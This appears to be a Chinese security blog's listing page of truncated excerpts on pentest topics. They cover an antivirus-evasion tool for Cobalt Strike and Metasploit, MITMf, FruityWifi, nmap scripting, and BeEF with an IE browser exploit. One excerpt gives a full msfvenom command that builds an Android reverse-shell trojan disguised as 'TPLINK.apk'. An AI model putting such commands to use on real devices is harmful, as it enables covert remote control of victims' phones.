本文我们来介绍一款在Cs和Msf中较好的免杀工具吧。注意: 本文仅供学习和研究。在了解技术和原理的前提下。更好的保护个人信息安全。反对一切危害网络安全的行为!造成法律后果与本文无关。环境Kali Linuxpython3.8安装git clone https://github.com/shellfeel/Ant-AntV cd Ant-AntV pip install -r requirements.txt生成shellcod
2023年02月02日
本文我们来介绍一款在Cs和Msf中较好的免杀工具吧。注意: 本文仅供学习和研究。在了解技术和原理的前提下。更好的保护个人信息安全。反对一切危害网络安全的行为!造成法律后果与本文无关。环境Kali Linuxpython3.8安装git clone https://github.com/shellfeel/Ant-AntV cd Ant-AntV pip install -r requirements.txt生成shellcod
2023年02月02日
普通版在 kali中我们可以利用 msfvenom来生成一个Android木马。命令如下:msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.232.195 LPORT=5555 R > TPLINK.apk这样便生成了一个名为 TPLINK.apk的Android木马。1.png然后我们配合 msfcosole进行攻
2022年12月04日
声明:本文具有一定攻击性,仅作为技术交流和安全教学之用,不要用在除了搭建环境之外的环境。0×01 题记又是一年十月一,想到小伙伴们都纷纷出门旅游,皆有美酒佳人相伴,想到这里,不禁潸然泪下。子曰:“长得丑就要多读书!”于是有了这篇文章。0×02 简要介绍这篇文章的主要目的是介绍一下一个最新的中间人攻击测试框架 – MITMf。工具的作者是byt3bl33d3r,是基于代理工具sergio-proxy修改而来。这里是工具的地址:https://github.com/byt3bl33d3r/MITMf
2022年12月04日
FruityWifi是一款无线安全审计,灵感来自于wifi pineapple。这个程序可以安装在Debian系列的操作系统上,在Debian, Kali Linux, Kali Linux ARM (Raspberry Pi), Raspbian (Raspberry Pi树莓派), Pwnpi (Raspberry Pi)测试通过。在这次新版本中,你可以安装第三方模块了,这些模块有Hostapd Karma URLsnarf DNSspoof Kismet Squid (
2022年12月04日
信息安全爱好者经常使用的Kali-Linux需要经常更新,扩充弹药,最近在关注Kali-Linux的时候发现一个比较有意思的文档。原链接如下:http://www.kali.org/news/kali-linux-metapackages下面我为大家简单的介绍下我的试用情况:通常我们更新kali需要执行的命令为:apt-get update&apt-get upgrade或者apt-get update&apt-get dist-upgrade关于apt-get update和a
2022年12月04日
帮朋友写一个nmap端口扫描然后与上次扫描进行对比的工具,与crontab结合定期扫描,保存对比数据。google搜索了一下相关的模块,在freebuf上看到有人分享过一个libnmap模块,看了一下他的官方文档,介绍的不多,但是很贴心的有demo代码,测试了一下,只要简单改改就可以完成一个我们想要的工具。工具说明:0)环境:Linux+python+nmap(kali) 1)默认targets.txt里面是扫描目标,或使用-t参数自定义扫描文件。 2)db.db是扫描结果文件,采用sqlite
2022年12月04日
全球有260万信息安全专业人士,渗透测试工具是他们“安全军火库”中最常使用的装备,但直到最近,可用的渗透测试工具才丰富起来,但这也带来一个问题,挑选合适的渗透测试工具成了一件麻烦事,一个最简单的方法就是参考同行们的选择。近日一位国外信息安全专家发起了一项渗透测试工具在线调查,来自世界各地超过700名安全专家参与了调查,目前调查尚在进行中,但是一些类别工具的流行度差异已经可以比较明显地看出来。我们将其中一些调查结果摘录在下面供大家参考:参与调查人员的职业分布,渗透测试专业人士居多渗透测试时使用的操
2022年12月04日
metasploit内网渗透方面好多方式,这只是科普下xss在内网中的利用。系统:KALI用到的工具:beEF+msf 利用的IE漏洞是:http://www.rapid7.com/db/modules/exploit/windows/browser/ie_execcommand_uafMS12-063 Automatic IE 7 on Windows XP SP3 IE 8 on Window
2022年08月04日
前言由于之前的服务都是在内网,Zookeeper集群配置都是走的内网IP,外网不开放相关端口。最近由于业务升级,购置了阿里云的服务,需要对外开放Zookeeper服务。问题Zookeeper+dubbo,如何设置安全认证?不想让其他服务连接Zookeeper,因为这个Zookeeper服务器在外网。查询官方文档:Zookeeper 是 Apacahe Hadoop 的子项目,是一个树型的目录服务,支持变更推送,适合作为 Dubbo 服务的注册中心,工业强度较高,可用于生产环境,并推荐使用。流程说